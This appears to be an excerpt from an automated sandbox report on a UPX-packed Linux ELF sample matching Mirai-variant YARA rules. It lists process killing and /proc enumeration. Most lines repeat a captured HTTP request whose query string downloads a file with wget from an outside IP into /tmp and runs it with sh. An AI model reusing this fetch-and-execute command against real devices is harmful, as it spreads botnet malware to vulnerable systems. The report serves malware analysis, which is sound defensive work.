Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive
Source: global traffic	HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+;wget+49.12.233.52/jaws;sh+/tmp/jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8Connection: keep-alive

System Summary:

Malicious sample detected (through community Yara rule)

Source: 5243.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY	Matched rule: Detects ELF Mirai variant Author: Florian Roth
Source: 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY	Matched rule: Detects ELF Mirai variant Author: Florian Roth

Sample tries to kill many processes (SIGKILL)

Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2018, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2077, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2078, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2079, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2080, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2083, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2084, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2156, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5251, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5252, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5253, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5254, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5255, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5256, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5274, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5285, result: successful	Jump to behavior

Sample contains only a LOAD segment without any section mappings

Source: LOAD without section mappings

Program segment: 0x8048000

Yara signature match

Source: 9o6Z1wEokT, type: SAMPLE	Matched rule: SUSP_ELF_LNX_UPX_Compressed_File date = 2018-12-12, author = Florian Roth, description = Detects a suspicious ELF binary with UPX compression, reference = Internal Research, score = 038ff8b2fef16f8ee9d70e6c219c5f380afe1a21761791e8cbda21fa4d09fdb4
Source: 5243.1.00000000764ea583.000000008517f29e.rw-.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5241.1.00000000764ea583.000000008517f29e.rw-.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5243.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5243.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY	Matched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
Source: 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 5241.1.000000001a887bdc.00000000531557b5.r-x.sdmp, type: MEMORY	Matched rule: MAL_ELF_LNX_Mirai_Oct10_1 date = 2018-10-27, hash1 = 3be2d250a3922aa3f784e232ce13135f587ac713b55da72ef844d64a508ddcfe, author = Florian Roth, description = Detects ELF Mirai variant, reference = Internal Research
Source: Process Memory Space: 9o6Z1wEokT PID: 5241, type: MEMORYSTR	Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =

Sample tries to kill a process (SIGKILL)

Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2018, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2077, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2078, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2079, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2080, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2083, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2084, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 2156, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5251, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5252, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5253, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5254, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5255, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5256, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5274, result: successful	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	SIGKILL sent: pid: 5285, result: successful	Jump to behavior

Source: 9o6Z1wEokT

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Source: classification engine

Classification label: mal100.spre.troj.evad.lin@0/0@1/0

Data Obfuscation:

Sample is packed with UPX

Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Info: This file is packed with the UPX executable packer http://upx.sf.net $
Source: initial sample	String containing UPX found: $Id: UPX 3.95 Copyright (C) 1996-2018 the UPX Team. All Rights Reserved. $

Persistence and Installation Behavior:

Enumerates processes within the "proc" file system

Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/5143/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4453/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1582/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2033/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2275/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/3088/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1612/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1579/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1699/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1335/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1698/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2028/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1334/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1576/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2302/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/3236/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2025/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2146/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/910/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/912/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/517/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/759/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/2307/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/918/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4460/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/5153/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/5274/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4461/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4462/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/4465/cmdline	Jump to behavior
Source: /tmp/9o6Z1wEokT (PID: 5248)	File opened: /proc/1594/cmdline	Jump to behavior
